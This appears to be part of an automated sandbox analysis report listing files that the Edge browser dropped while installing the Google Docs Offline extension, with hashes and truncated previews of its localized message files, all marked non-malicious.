                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_395530944\CRX_INSTALL\_locales\pt_BR\messages.json

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):907
                                                                                                                                                                                                                                                                        Entropy (8bit):4.599411354657937
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
                                                                                                                                                                                                                                                                        MD5:608551F7026E6BA8C0CF85D9AC11F8E3
                                                                                                                                                                                                                                                                        SHA1:87B017B2D4DA17E322AF6384F82B57B807628617
                                                                                                                                                                                                                                                                        SHA-256:A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
                                                                                                                                                                                                                                                                        SHA-512:82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_395530944\CRX_INSTALL\_locales\pt_PT\messages.json

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):914
                                                                                                                                                                                                                                                                        Entropy (8bit):4.604761241355716
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
                                                                                                                                                                                                                                                                        MD5:0963F2F3641A62A78B02825F6FA3941C
                                                                                                                                                                                                                                                                        SHA1:7E6972BEAB3D18E49857079A24FB9336BC4D2D48
                                                                                                                                                                                                                                                                        SHA-256:E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
                                                                                                                                                                                                                                                                        SHA-512:22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_395530944\CRX_INSTALL\_locales\ro\messages.json

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):937
                                                                                                                                                                                                                                                                        Entropy (8bit):4.686555713975264
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:1HA8dC6e6w+uFPHf2TFMMlecFpweWV4RE:pC6KvHf4plVweCx
                                                                                                                                                                                                                                                                        MD5:BED8332AB788098D276B448EC2B33351
                                                                                                                                                                                                                                                                        SHA1:6084124A2B32F386967DA980CBE79DD86742859E
                                                                                                                                                                                                                                                                        SHA-256:085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
                                                                                                                                                                                                                                                                        SHA-512:22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_395530944\CRX_INSTALL\_locales\ru\messages.json

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1337
                                                                                                                                                                                                                                                                        Entropy (8bit):4.69531415794894
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
                                                                                                                                                                                                                                                                        MD5:51D34FE303D0C90EE409A2397FCA437D
                                                                                                                                                                                                                                                                        SHA1:B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
                                                                                                                                                                                                                                                                        SHA-256:BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
                                                                                                                                                                                                                                                                        SHA-512:E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": ".......".. },.. "explanationofflinedisabled": {.. "message": "..... ............ Google ......... ... ........., ............ . .... . ......... ............. . ......-...... . .......... .. ......... .........".. },.. "explanationofflineenabled": {.. "message": "... ........... . .......... .. ...... ......... ..... ..... . ............. .., . ....... ........ ......-.......".. },.. "extdesc": {.. "message": ".........., .............. . ............ ........., ....... . ........... ... ....... . ..........".. },.. "extname": {.. "message": "Google.......... ......".. },.. "learnmore": {.

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_395530944\CRX_INSTALL\_locales\si\messages.json

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):2846
                                                                                                                                                                                                                                                                        Entropy (8bit):3.7416822879702547
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
                                                                                                                                                                                                                                                                        MD5:B8A4FD612534A171A9A03C1984BB4BDD
                                                                                                                                                                                                                                                                        SHA1:F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
                                                                                                                                                                                                                                                                        SHA-256:54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
                                                                                                                                                                                                                                                                        SHA-512:C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"\u0db1\u0dc0 \u0dbd\u0dda\u0d9b\u0db1\u0dba\u0d9a\u0dca \u0dc3\u0dcf\u0daf\u0db1\u0dca\u0db1"},"explanationofflinedisabled":{"message":"\u0d94\u0db6 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2\u0dba. \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd \u0dc3\u0db8\u0dca\u0db6\u0db1\u0dca\u0db0\u0dad\u0dcf\u0dc0\u0d9a\u0dca \u0db1\u0ddc\u0db8\u0dd0\u0dad\u0dd2\u0dc0 Google Docs \u0db7\u0dcf\u0dc0\u0dd2\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8\u0da7, Google Docs \u0db8\u0dd4\u0dbd\u0dca \u0db4\u0dd2\u0da7\u0dd4\u0dc0 \u0db8\u0dad \u0dc3\u0dd0\u0d9a\u0dc3\u0dd3\u0db8\u0dca \u0dc0\u0dd9\u0dad \u0d9c\u0ddc\u0dc3\u0dca \u0d94\u0db6 \u0d8a\u0dc5\u0d9f \u0d85\u0dc0\u0dc3\u0dca\u0dae\u0dcf\u0dc0\u0dda \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd\u0dba\u0da7 \u0dc3\u0db6\u0dd0\u0db3\u0dd2 \u0dc0\u0dd2\u0da7 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2 \u0dc3\u0db8\u0db8\u0dd4\u0dc4\u0dd4\u0dbb\u0dca\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8 \u0d9a\u0dca\u200d\u0dbb\u0dd2\u0dba\u0dc

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_395530944\CRX_INSTALL\_locales\sk\messages.json

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):934
                                                                                                                                                                                                                                                                        Entropy (8bit):4.882122893545996
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:1HAF8pMv1RS4LXL22IUjdh8uJwpPqLDEtxKLhSS:hyv1RS4LXx38u36QsS
                                                                                                                                                                                                                                                                        MD5:8E55817BF7A87052F11FE554A61C52D5
                                                                                                                                                                                                                                                                        SHA1:9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
                                                                                                                                                                                                                                                                        SHA-256:903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
                                                                                                                                                                                                                                                                        SHA-512:EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_395530944\CRX_INSTALL\_locales\sl\messages.json

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):963
                                                                                                                                                                                                                                                                        Entropy (8bit):4.6041913416245
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgfECBxNFCEuKXowwJrpvPwNgEcPJJJEfWOCBxeFCJuGuU4KYXCSUXKDxX4A:1HAXMKYw8VYNLcaeDmKYLdX2zJBG5
                                                                                                                                                                                                                                                                        MD5:BFAEFEFF32813DF91C56B71B79EC2AF4
                                                                                                                                                                                                                                                                        SHA1:F8EDA2B632610972B581724D6B2F9782AC37377B
                                                                                                                                                                                                                                                                        SHA-256:AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
                                                                                                                                                                                                                                                                        SHA-512:971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_395530944\CRX_INSTALL\_locales\sr\messages.json

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1320
                                                                                                                                                                                                                                                                        Entropy (8bit):4.569671329405572
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:1HArg/fjQg2JwrfZtUWTrw1P4epMnRGi5TBmuPDRxZQ/XtiCw/Rwh/Q9EVz:ogUg2JwDZe6rwKI8VTP9xK1CwhI94
                                                                                                                                                                                                                                                                        MD5:7F5F8933D2D078618496C67526A2B066
                                                                                                                                                                                                                                                                        SHA1:B7050E3EFA4D39548577CF47CB119FA0E246B7A4
                                                                                                                                                                                                                                                                        SHA-256:4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
                                                                                                                                                                                                                                                                        SHA-512:0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "....... ....".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. ..... ......... Google ......... ... ........ ...., ..... . .......... .. ........ ........ Google .......... . ........ ...... .............. ... ....... ... ...... ........ .. ...........".. },.. "explanationofflineenabled": {.. "message": "...... ..., ... . .... ...... .. ....... ...... . ........ ........ ... .. ....... .....".. },.. "extdesc": {.. "message": "....... . ........... ........., ...... . ............ . ....... ...... . ... . ... .. ... ........ .........".. },.. "extname": {.. "message

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_395530944\CRX_INSTALL\_locales\sv\messages.json

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):884
                                                                                                                                                                                                                                                                        Entropy (8bit):4.627108704340797
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:1HA0NOYT/6McbnX/yzklyOIPRQrJlvDymvBd:vNOcyHnX/yg0P4Bymn
                                                                                                                                                                                                                                                                        MD5:90D8FB448CE9C0B9BA3D07FB8DE6D7EE
                                                                                                                                                                                                                                                                        SHA1:D8688CAC0245FD7B886D0DEB51394F5DF8AE7E84
                                                                                                                                                                                                                                                                        SHA-256:64B1E422B346AB77C5D1C77142685B3FF7661D498767D104B0C24CB36D0EB859
                                                                                                                                                                                                                                                                        SHA-512:6D58F49EE3EF0D3186EA036B868B2203FE936CE30DC8E246C32E90B58D9B18C624825419346B62AF8F7D61767DBE9721957280AA3C524D3A5DFB1A3A76C00742
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_395530944\CRX_INSTALL\_locales\sw\messages.json

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):980
                                                                                                                                                                                                                                                                        Entropy (8bit):4.50673686618174
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgNHCBxNx1HMHyMhybK7QGU78oCuafIvfCBxex6EYPE5E1pOCSUJqONtCBh8:1HAGDQ3y0Q/Kjp/zhDoKMkeAT6dBaX
                                                                                                                                                                                                                                                                        MD5:D0579209686889E079D87C23817EDDD5
                                                                                                                                                                                                                                                                        SHA1:C4F99E66A5891973315D7F2BC9C1DAA524CB30DC
                                                                                                                                                                                                                                                                        SHA-256:0D20680B74AF10EF8C754FCDE259124A438DCE3848305B0CAF994D98E787D263
                                                                                                                                                                                                                                                                        SHA-512:D59911F91ED6C8FF78FD158389B4D326DAF4C031B940C399569FE210F6985E23897E7F404B7014FC7B0ACEC086C01CC5F76354F7E5D3A1E0DEDEF788C23C2978
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wengine popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_395530944\CRX_INSTALL\_locales\ta\messages.json

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1941
                                                                                                                                                                                                                                                                        Entropy (8bit):4.132139619026436
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:1HAoTZwEj3YfVLiANpx96zjlXTwB4uNJDZwq3CP1B2xIZiIH1CYFIZ03SoFyxrph:JCEjWiAD0ZXkyYFyPND1L/I
                                                                                                                                                                                                                                                                        MD5:DCC0D1725AEAEAAF1690EF8053529601
                                                                                                                                                                                                                                                                        SHA1:BB9D31859469760AC93E84B70B57909DCC02EA65
                                                                                                                                                                                                                                                                        SHA-256:6282BF9DF12AD453858B0B531C8999D5FD6251EB855234546A1B30858462231A
                                                                                                                                                                                                                                                                        SHA-512:6243982D764026D342B3C47C706D822BB2B0CAFFA51F0591D8C878F981EEF2A7FC68B76D012630B1C1EB394AF90EB782E2B49329EB6538DD5608A7F0791FDCF5
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "..... ....... .........".. },.. "explanationofflinedisabled": {.. "message": ".......... ........... .... ....... ..... Google ......... .........., ...... .... ........... ......... ...., Google ... ................... ................ ......, ........ ......... ..........".. },.. "explanationofflineenabled": {.. "message": ".......... ..........., .......... .......... .......... ......... ........... ...... .....

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_395530944\CRX_INSTALL\_locales\te\messages.json

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1969
                                                                                                                                                                                                                                                                        Entropy (8bit):4.327258153043599
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:R7jQrEONienBcFNBNieCyOBw0/kCcj+sEf24l+Q+u1LU4ljCj55ONipR41ssrNix:RjQJN1nBcFNBNlCyGcj+RXl+Q+u1LU4s
                                                                                                                                                                                                                                                                        MD5:385E65EF723F1C4018EEE6E4E56BC03F
                                                                                                                                                                                                                                                                        SHA1:0CEA195638A403FD99BAEF88A360BD746C21DF42
                                                                                                                                                                                                                                                                        SHA-256:026C164BAE27DBB36A564888A796AA3F188AAD9E0C37176D48910395CF772CEA
                                                                                                                                                                                                                                                                        SHA-512:E55167CB5638E04DF3543D57C8027B86B9483BFCAFA8E7C148EDED66454AEBF554B4C1CF3C33E93EC63D73E43800D6A6E7B9B1A1B0798B6BDB2F699D3989B052
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "..... ...... ........ ......".. },.. "explanationofflinedisabled": {.. "message": ".... ........... ........ ......... ........ ....... Google Docs... .............., .... ............ ....... ..... ...... .... Google Docs .... ...... ............. ......, ........ ........ ... .......".. },.. "explanationofflineenabled": {.. "message": ".... ........... ......., .... .... ........ .......... .... ....... ..... ....... .... ..

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_395530944\CRX_INSTALL\_locales\th\messages.json

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1674
                                                                                                                                                                                                                                                                        Entropy (8bit):4.343724179386811
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:fcGjnU3UnGKD1GeU3pktOggV1tL2ggG7Q:f3jnDG1eUk0g6RLE
                                                                                                                                                                                                                                                                        MD5:64077E3D186E585A8BEA86FF415AA19D
                                                                                                                                                                                                                                                                        SHA1:73A861AC810DABB4CE63AD052E6E1834F8CA0E65
                                                                                                                                                                                                                                                                        SHA-256:D147631B2334A25B8AA4519E4A30FB3A1A85B6A0396BC688C68DC124EC387D58
                                                                                                                                                                                                                                                                        SHA-512:56DD389EB9DD335A6214E206B3BF5D63562584394D1DE1928B67D369E548477004146E6CB2AD19D291CB06564676E2B2AC078162356F6BC9278B04D29825EF0C
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": ".............. ............. Google .................................... ............................... Google ...... .................................................................".. },.. "explanationofflineenabled": {.. "message": "................................................................".. },.. "extdesc": {.. "message": "..... ..... ........

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_395530944\CRX_INSTALL\_locales\tr\messages.json

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1063
                                                                                                                                                                                                                                                                        Entropy (8bit):4.853399816115876
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:1HAowYuBPgoMC4AGehrgGm7tJ3ckwFrXnRs5m:GYsPgrCtGehkGc3cvXr
                                                                                                                                                                                                                                                                        MD5:76B59AAACC7B469792694CF3855D3F4C
                                                                                                                                                                                                                                                                        SHA1:7C04A2C1C808FA57057A4CCEEE66855251A3C231
                                                                                                                                                                                                                                                                        SHA-256:B9066A162BEE00FD50DC48C71B32B69DFFA362A01F84B45698B017A624F46824
                                                                                                                                                                                                                                                                        SHA-512:2E507CA6874DE8028DC769F3D9DFD9E5494C268432BA41B51568D56F7426F8A5F2E5B111DDD04259EB8D9A036BB4E3333863A8FC65AAB793BCEF39EDFE41403B
                                                                                                                                                                                                                                                                        Malicious:false
